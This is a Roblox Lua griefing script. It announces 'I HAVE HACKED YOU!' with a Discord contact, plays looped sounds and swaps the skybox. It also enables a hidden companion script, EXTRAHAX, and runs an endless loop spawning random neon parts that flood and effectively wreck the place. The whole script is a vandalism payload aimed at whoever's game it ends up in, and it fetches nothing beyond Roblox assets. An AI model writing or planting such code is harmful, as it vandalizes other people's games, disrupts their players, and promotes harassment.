print("THIS IS WHAT YOU GET FOR CALLING ME FAT, SOCIETY!!!!!")
wait(5)
CRex2122 = Instance.new("Sound")
CRex2122.Parent = game.Workspace
CRex2122.Looped = true
CRex2122.SoundId = "rbxassetid://156691762"
CRex2122.Volume = 1
wait(8)
CRex2122:play()
wait(10)
discord=Instance.new("Hint")
discord.Text = "I HAVE HACKED YOU! If you wanna come get ME (if you dare), you can add me on discord: C-Rex#2122"
discord.Parent = game.Workspace
wait(0.5)
discord=Instance.new("Message")
discord.Text = "THIS IS WHAT YOU GET FOR CALLING ME FAT!!! D:<"
discord.Parent = game.Workspace
wait(8)
CRex2122.SoundId = "rbxassetid://272948636"
discord:remove()
death=Instance.new("Sky")
death.Parent = game.Lighting
death.SkyboxBk = "http://www.roblox.com/asset/?id=2774962835"
death.SkyboxDn = "http://www.roblox.com/asset/?id=2774962835"
death.SkyboxFt = "http://www.roblox.com/asset/?id=2774962835"
death.SkyboxLf = "http://www.roblox.com/asset/?id=2774962835"
death.SkyboxRt = "http://www.roblox.com/asset/?id=2774962835"
death.SkyboxUp = "http://www.roblox.com/asset/?id=2774962835"
death.CelestialBodiesShown = false
wait(1)
script.EXTRAHAX.Disabled = false
--your place is now doomed, gg no re

while true do
	communism=math.random(0,3)
	crex=math.random(3,100)
	obesity=math.random(-500, 500)
	positivity=math.random(100, 600)
	IEndorseThese=math.random(-500, 500)
	wait()
	doom=Instance.new("Part")
	local imnotfat = math.random(1, 3)
	if imnotfat == 1 then
	doom.Shape = "Ball"
	else if imnotfat == 2 then
		doom.Shape = "Cylinder"
	else 
	end end
	doom.Material = "Neon"
	doom.Size = Vector3.new(crex, crex, crex)
	doom.Position = Vector3.new(obesity, positivity, IEndorseThese)
	doom.Color = Color3.new(math.random(), math.random(), math.random())
	doom.Velocity=Vector3.new(communism, communism, communism)
	doom.Parent = game.Workspace
	yooka=math.random(-200, -50)
	doom=Instance.new("Part")
	doom.Shape = "Ball"
	doom.Size = Vector3.new(crex, crex, crex)
	doom.Position = Vector3.new(obesity, yooka, IEndorseThese)
	doom.Color = Color3.new(math.random(), math.random(), math.random())
	doom.Velocity=Vector3.new(communism, 800, communism)
	doom.Parent = game.Workspace
		communism=math.random(0,3)
	crex=math.random(3,100)
	obesity=math.random(-500, 500)
	positivity=math.random(100, 600)
	IEndorseThese=math.random(-500, 500)
	doom=Instance.new("Part")
	doom.Shape = "Ball"
	doom.Size = Vector3.new(crex, crex, crex)
	doom.Position = Vector3.new(obesity, positivity, IEndorseThese)
	doom.Color = Color3.new(math.random(), math.random(), math.random())
	doom.Velocity=Vector3.new(communism, communism, communism)
	doom.Parent = game.Workspace
		communism=math.random(0,3)
	crex=math.random(3,100)
	obesity=math.random(-500, 500)
	positivity=math.random(100, 600)
	IEndorseThese=math.random(-500, 500)
	doom=Instance.new("Part")
	doom.Shape = "Ball"
	doom.Size = Vector3.new(crex, crex, crex)
	doom.Position = Vector3.new(obesity, positivity, IEndorseThese)
	doom.Color = Color3.new(math.random(), math.random(), math.random())
	doom.Velocity=Vector3.new(communism, communism, communism)
	doom.Parent = game.Workspace
		communism=math.random(0,3)
	crex=math.random(3,100)
	obesity=math.random(-500, 500)
	positivity=math.random(100, 600)
	IEndorseThese=math.random(-500, 500)
	doom=Instance.new("Part")
	doom.Shape = "Ball"
	doom.Size = Vector3.new(crex, crex, crex)
	doom.Position = Vector3.new(obesity, positivity, IEndorseThese)
	doom.Color = Color3.new(math.random(), math.random(), math.random())
	doom.Velocity=Vector3.new(communism, communism, communism)
	doom.Parent = game.Workspace
end
